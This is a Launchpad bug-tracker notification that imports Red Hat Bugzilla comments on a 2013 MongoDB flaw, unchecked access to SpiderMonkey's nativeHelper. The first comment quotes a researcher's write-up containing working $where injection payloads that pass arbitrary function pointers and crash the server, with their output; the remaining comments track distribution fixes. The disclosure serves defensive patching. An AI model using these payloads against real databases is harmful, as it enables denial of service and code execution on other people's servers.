Launchpad has imported 8 comments from the remote bug at https://bugzilla.redhat.com/show_bug.cgi?id=927536.
If you reply to an imported comment from within Launchpad, your comment will be sent to the remote bug automatically. Read more about Launchpad's inter-bugtracker facilities at https://help.launchpad.net/InterBugTracking. ------------------------------------------------------------------------ On 2013-03-26T07:19:51+00:00 Kurt wrote: SCRT Information Security reports: mongodb – SSJI to RCE Posted on mars 24, 2013 par agixid Lucky discovery Trying some server side javascript injection in mongodb, I wondered if it would be possible to pop a shell. The run method seems good for this : > run("uname","-a") Sun Mar 24 07:09:49 shell: started program uname -a sh1838| Linux mongo 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux 0 Unfortunately, this command is only effective in mongo client : > db.my_collection.find({$where:"run('ls')"}) error: { "$err" : "error on invocation of $where function:\nJS Error: ReferenceError: run is not defined nofile_a:0", "code" : 10071 } But let’s dig a little bit. > run function () { return nativeHelper.apply(run_, arguments); } So you can run the « run » function directly by calling nativeHelper.apply(run_,["uname","-a"]); In server side, the result show us that nativeHelper.apply method exists ! > db.my_collection.find({$where:'nativeHelper.apply(run_, ["uname","-a"]);'}) error: { "$err" : "error on invocation of $where function:\nJS Error: ReferenceError: run_ is not defined nofile_a:0", "code" : 10071 } So what’s run_ ? So what's "run_" > run_ { "x" : 135246144 } An associative array, can we use it in server side ? > db.my_collection.find({$where:'nativeHelper.apply({"x":135246144}, > ["uname","-a"]);'}) Sun Mar 24 07:15:26 DBClientCursor::init call() failed Sun Mar 24 07:15:26 query failed : sthack.my_collection { $where: "nativeHelper.apply({"x":135246144}, ["uname","-a"]);" } to: 127.0.0.1:27017 Error: error doing query: failed Sun Mar 24 07:15:26 trying reconnect to 127.0.0.1:27017 Sun Mar 24 07:15:26 reconnect 127.0.0.1:27017 failed couldn't connect to server 127.0.0.1:27017 The server crashed \o/ ! Let’s check the source code : ./src/mongo/scripting/engine_spidermonkey.cpp JSBool native_helper( JSContext *cx , JSObject *obj , uintN argc, jsval *argv , jsval *rval ) { try { Convertor c(cx); NativeFunction func = reinterpret_cast( static_cast( c.getNumber( obj , "x" ) ) ); void* data = reinterpret_cast<void*>( static_cast( c.getNumber( obj , "y" ) ) ); verify( func ); BSONObj a; if ( argc > 0 ) { BSONObjBuilder args; for ( uintN i = 0; i < argc; ++i ) { c.append( args , args.numStr( i ) , argv[i] ); } a = args.obj(); } BSONObj out; try { out = func( a, data ); } catch ( std::exception& e ) { nativeHelper is a crazy feature in spidermonkey missused by mongodb: the NativeFunction func come from x javascript object and then is called without any check !!! > db.my_collection.find({$where:'nativeHelper.apply({"x":0x31337}, ["uname","-a"]);'}) Sun Mar 24 07:20:03 Invalid access at address: 0x31337 from thread: conn1 Sun Mar 24 07:20:03 Got signal: 11 (Segmentation fault). External references: http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/ Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/0 ------------------------------------------------------------------------ On 2013-03-26T15:59:19+00:00 Troy wrote: Has this been tried on the Fedora's mongodb? I ask that because we use v8 instead of spidermonkey, but I'm not positive that our version of mongodb didn't get something slipped in. Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/1 ------------------------------------------------------------------------ On 2013-03-27T05:56:52+00:00 Kurt wrote: Created mongodb tracking bugs for this issue Affects: epel-all [bug 928192] Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/2 ------------------------------------------------------------------------ On 2013-03-27T05:58:04+00:00 Kurt wrote: Created mongodb tracking bugs for this issue Affects: fedora-all [bug 928193] Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/3 ------------------------------------------------------------------------ On 2013-03-27T11:00:23+00:00 Jan wrote: References: http://www.openwall.com/lists/oss-security/2013/03/25/7 Relevant upstream tracker: https://jira.mongodb.org/browse/SERVER-9124 Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/4 ------------------------------------------------------------------------ On 2013-07-26T06:15:27+00:00 Kurt wrote: Removed due to typo. Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/11 ------------------------------------------------------------------------ On 2013-08-21T17:29:32+00:00 errata-xmlrpc wrote: This issue has been addressed in following products: MRG for RHEL-6 v.2 Via RHSA-2013:1170 https://rhn.redhat.com/errata/RHSA-2013-1170.html Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/12 ------------------------------------------------------------------------ On 2014-08-08T19:39:52+00:00 Kurt wrote: Red Hat Update Infrastructure 2.1.3 is now in Production 2 Phase of the support and maintenance life cycle. This has been rated as having Important security impact, however as used in RHUI this issue is not exposed to untrusted users, as such it is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Update Infrastructure Life Cycle: https://access.redhat.com/support/policy/updates/rhui. Reply at: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/comments/13 ** Changed in: mongodb (Fedora) Status: Unknown => Fix Released ** Changed in: mongodb (Fedora) Importance: Unknown => High -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1160893 Title: Unchecked access to SpiderMonkey’s JavaScript nativeHelper function To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/mongodb/+bug/1160893/+subscriptions -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
